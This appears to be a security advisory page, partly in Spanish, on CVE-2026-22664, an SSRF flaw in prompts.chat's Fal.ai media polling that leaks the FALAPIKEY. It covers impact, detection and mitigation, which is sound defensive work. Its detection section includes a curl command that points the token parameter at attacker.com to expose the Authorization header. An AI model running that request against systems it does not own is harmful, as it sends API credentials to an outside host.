Plataforma
nodejs
Componente
prompts-chat
Corregido en
30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99
CVE-2026-22664 describes a server-side request forgery (SSRF) vulnerability discovered in prompts.chat, specifically within the Fal.ai media status polling functionality. This flaw allows authenticated users to initiate arbitrary outbound requests by manipulating the token parameter, bypassing URL validation controls. Affected versions include those prior to commit 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99, and a fix is available in version 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99.
The SSRF vulnerability in prompts.chat poses a significant risk because it enables attackers to disclose sensitive credentials. By crafting malicious URLs within the token parameter, an attacker can trick the application into making outbound requests to arbitrary destinations. Crucially, this can lead to the exposure of the FALAPIKEY, which is included in the Authorization header of these requests. With possession of this API key, an attacker could impersonate the victim user, access and manipulate data within the Fal.ai account, probe the internal network for further vulnerabilities, and potentially launch further attacks leveraging the compromised account. The blast radius extends beyond the immediate application to encompass the entire Fal.ai ecosystem and any internal resources accessible through the victim's account.
CVE-2026-22664 was publicly disclosed on April 3, 2026. There is currently no indication of active exploitation campaigns targeting this vulnerability. The EPSS score is pending evaluation. Public proof-of-concept code is not yet available, but the vulnerability's nature and the potential for credential theft make it a likely target for exploitation. Monitor security advisories and threat intelligence feeds for any updates.
Organizations utilizing prompts.chat for internal communication or AI-powered chatbot applications are at risk. Specifically, deployments that rely on Fal.ai for media processing or storage are particularly vulnerable. Shared hosting environments where multiple users share the same prompts.chat instance should be carefully assessed, as a compromised account could impact other users.
• nodejs / server: Monitor application logs for outbound requests to unusual or unexpected domains. Use lsof or netstat to identify processes making outbound connections to suspicious IP addresses or ports.
lsof -i | grep prompts.chat• generic web: Use curl to test the media status polling endpoint with a crafted URL containing a known malicious domain. Examine the response headers for any signs of credential leakage.
curl -v 'https://your-prompts-chat-instance/api/media_status?token=https://attacker.com' 2>&1 | grep Authorizationdisclosure
Estado del Exploit
EPSS
0.03% (9% percentil)
CISA SSVC
Vector CVSS
The primary mitigation for CVE-2026-22664 is to immediately upgrade prompts.chat to version 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99 or later, which contains the fix for the SSRF vulnerability. If upgrading is not immediately feasible, consider implementing a Web Application Firewall (WAF) or reverse proxy to filter outbound requests and block those containing suspicious URLs. Specifically, configure the WAF to block requests with attacker-controlled URLs in the token parameter. Additionally, review and restrict network access for the Fal.ai application to minimize the potential impact of a successful exploitation. After upgrading, confirm the fix by attempting to trigger the media status polling with a crafted URL and verifying that the FALAPIKEY is not exposed in the outbound request.
Actualice prompts.chat a la versión que incluye el commit 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99. Esta corrección valida las URLs proporcionadas en el parámetro token durante el polling del estado de los medios de Fal.ai, mitigando la vulnerabilidad SSRF.
Análisis de vulnerabilidades y alertas críticas directamente en tu correo.
CVE-2026-22664 is a server-side request forgery vulnerability in prompts.chat that allows attackers to disclose sensitive API keys by manipulating URLs.
You are affected if you are using prompts.chat versions prior to 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99.
Upgrade to version 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99 or later. Implement WAF rules to block suspicious outbound requests.
There is currently no confirmed active exploitation, but the vulnerability's potential for credential theft makes it a likely target.
Refer to the prompts.chat release notes and security advisories on their official website or GitHub repository.
Sube tu archivo de dependencias y detecta esta y otras CVEs al instante.